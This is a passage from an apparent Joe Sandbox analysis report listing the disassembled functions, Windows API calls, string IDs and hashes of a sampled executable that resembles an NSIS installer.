                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                                    • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                                    • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                                  • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                                  • API String ID: 1265525490-3322868524
                                                                                                                                                  • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                                  • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                                  • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                                  • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                                  APIs
                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                  • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                  • String ID: F
                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                  • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                                  • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                                  • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                                  • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                                  APIs
                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061E1
                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061F5
                                                                                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00406208
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\________.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 589700163-2032017099
                                                                                                                                                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                                  • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                                  • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                                  APIs
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                                  • String ID: 8$C:\Users\user\AppData\Local\Temp\nshD4CB.tmp$C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll
                                                                                                                                                  • API String ID: 1453599865-1025895127
                                                                                                                                                  • Opcode ID: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                                  • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                                  • Opcode Fuzzy Hash: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                                  • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                                  • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                                  • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                                    • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                                  • String ID: 9
                                                                                                                                                  • API String ID: 1149667376-2366072709
                                                                                                                                                  • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                                  • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                                  • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                                  • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3294113728-0
                                                                                                                                                  • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                                  • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                                  • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                                  • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                                  • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                                  • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                                  • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                                  • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                                  • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                                                  • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                                  • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                                                  • wsprintfW.USER32 ref: 00402D81
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                                    • Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,00000327), ref: 00402D13
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                  • String ID: ... %d%%
                                                                                                                                                  • API String ID: 722711167-2449383134
                                                                                                                                                  • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                                  • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                                                  • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                                  • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                                                  • GetMessagePos.USER32 ref: 00404A81
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                  • String ID: f
                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                                  • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                                  • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(?), ref: 00401D44
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
